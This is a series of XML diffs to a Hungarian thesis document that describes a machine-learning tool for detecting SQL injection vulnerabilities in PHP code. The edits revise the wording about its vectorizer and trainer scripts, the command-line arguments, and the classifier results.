-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>jában.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Így a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\machine_learning_app\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>vectorizer</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.py</w:t>
+        <w:t xml:space="preserve"> fájl</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>okat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> hoz</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>zon</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> létre, ami</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ket</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> később az osztályozásért felelős fájl használni tud.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18317,123 +18438,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>már a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>z</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>összefűzött</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>és felcí</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>m</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">kézett </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\machine_learning_app\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>tanulo_adatok</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>AST</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>concatenated</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>_titled</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.csv</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-t dolgozza fel.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Kifejtve a fájl főbb metódusait:</w:t>
+        <w:t>Kifejtve a főbb metódusait:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -19281,6 +19286,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>változóba</w:t>
       </w:r>
       <w:r>
@@ -19323,7 +19329,6 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>változóban megadottra, így a vektorok hossza egységes marad.</w:t>
       </w:r>
       <w:r>
@@ -19487,23 +19492,13 @@
         </w:rPr>
         <w:t xml:space="preserve">z </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>X[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">40] </w:t>
+        <w:t xml:space="preserve">X[40] </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19762,14 +19757,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> változókat lementi egy-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>egy .</w:t>
+        <w:t xml:space="preserve"> változókat lementi egy-egy .</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -19779,7 +19767,6 @@
         <w:t>npy</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -19793,123 +19780,192 @@
         <w:ind w:firstLine="567"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">A </w:t>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> program utolsó és legfontosabb lepésében a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>\machine_learning_app</w:t>
-      </w:r>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>\cevtorizer.py</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+        <w:t>machine_learning_app</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>trainer.py</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>on</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> be</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">lül </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>hajtja végre a program legfőbb feladatát: betanítja a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> választott </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">algoritmust és </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ad</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>tehát két</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">egy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">becslést </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>egy ismeretlen</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> PHP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>olyan .</w:t>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">kód SQL </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>npy</w:t>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>injectionbeli</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> fájlt hoz létre, amit később </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>machine_learning_app</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>trainer.py</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, az osztályozásért felelős fájl </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>tud használni.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sebezhetőségével kapcsolatban.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -23449,7 +23505,7 @@
   <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="497422CA"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="A65A3604"/>
+    <w:tmpl w:val="3F8AFC22"/>
     <w:lvl w:ilvl="0" w:tplc="040E0001">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>

</xml_diff>

<commit_message>
Add funkcion docs to trainer.py
</commit_message>
<xml_diff>
--- a/szakdolgozat.docx
+++ b/szakdolgozat.docx
@@ -15690,19 +15690,43 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">egy olyan karakter választja el, ami az értékek </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">– továbbiakban tokenek - </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">között nem fordul elő, ezáltal </w:t>
+        <w:t>egy olyan karakter választja el, ami az érték</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ben</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>– továbbiakban toke</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>nekben</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">nem fordul elő, ezáltal </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16013,13 +16037,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>második oszlopában</w:t>
+        <w:t xml:space="preserve"> második oszlopában</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16462,7 +16480,19 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">zoknak a tokeneknek a maximális száma, amelyeket megkülönböztetünk egymástól </w:t>
+        <w:t>zoknak a tokeneknek a maximális szám</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>á</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, amelyeket megkülönböztetünk egymástól </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16500,7 +16530,19 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">nnak a maximális száma, </w:t>
+        <w:t>nnak a maximális szám</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>át</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16743,7 +16785,13 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>sorozatot</w:t>
+        <w:t>sorozato</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kat</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16799,7 +16847,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">A collection.Counter típusából adódóan biztosítja a </w:t>
+        <w:t xml:space="preserve">A collection.Counter típusából adódóan biztosítja </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16894,13 +16942,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> tokenjei</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>nek</w:t>
+        <w:t xml:space="preserve"> tokenjeinek</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16928,7 +16970,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>indextoword</w:t>
+        <w:t>index</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16936,7 +16978,15 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>.</w:t>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>word.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17127,15 +17177,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>max_length</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">max_length </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17256,10 +17298,10 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CF0CC3C" wp14:editId="4CD7F8BB">
-            <wp:extent cx="3784795" cy="1892397"/>
-            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
-            <wp:docPr id="23" name="Kép 23"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D9F5D49" wp14:editId="1BAC2234">
+            <wp:extent cx="3553132" cy="1866900"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+            <wp:docPr id="3" name="Kép 3"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -17279,7 +17321,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="3784795" cy="1892397"/>
+                      <a:ext cx="3560234" cy="1870631"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -17764,19 +17806,97 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">egyrészt beolvassa a „toimport” numpy fájlokat, amiket a classifier2 metódusnak ad át, másrészt </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">beolvassa a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">„test” </w:t>
+        <w:t xml:space="preserve">egyrészt beolvassa </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">parancssori argumentumokon keresztül </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a „toimpor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tX</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>” numpy fáj</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (-z)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, amiket a classifier2 metódusnak ad át, másrészt </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">beolvassa </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">hasonló módon (-x, -y) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>„test</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>X</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> „testy”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17902,7 +18022,19 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">A felügyelt tanulás 5 fő algoritmusára </w:t>
+        <w:t>A felügyelt tanulás 5 fő algoritmusára</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -…-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17914,7 +18046,19 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>a test_bmodel metódus</w:t>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>classifier</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> metódus</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17962,13 +18106,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> az algoritmusokat, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>aminek az eredményét a 3.</w:t>
+        <w:t xml:space="preserve"> az algoritmusokat, aminek az eredményét a 3.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17998,25 +18136,19 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Látható, hogy a Gaussian Naive Bayes éri el a legnagyobb értéket 73,9%-os pontossággal. Bár minden futás során újragerenálódnak ezek az értékek, de a végeredmény ugyan az: a GaussianNB 73% és 77% közötti Recall értékkel az első helyen marad, így a tanulást már ez az algoritmus végzi</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a classifier met</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ódus </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>segítségével.</w:t>
+        <w:t xml:space="preserve"> Ekkor automatikusan kiválasztja a legnagyobb értékhez tartozó osztályozót</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> és meghívja rá a classifier2 metódust</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -18103,26 +18235,26 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> a korábbi </w:t>
+        <w:t xml:space="preserve"> a korábbi fejezetben,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> hogy</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a Confusion Matrix Recall értéke a leghasznosabb, ha egy </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>fejezetben,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> hogy</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a Confusion Matrix Recall értéke a leghasznosabb, ha egy kód sérülékenységéről van sz</w:t>
+        <w:t>kód sérülékenységéről van sz</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18179,55 +18311,61 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">az </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>adatkészlet tanításához elkülönített részét</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>használja fel</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a két állapot</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>megkülönböztetésére</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
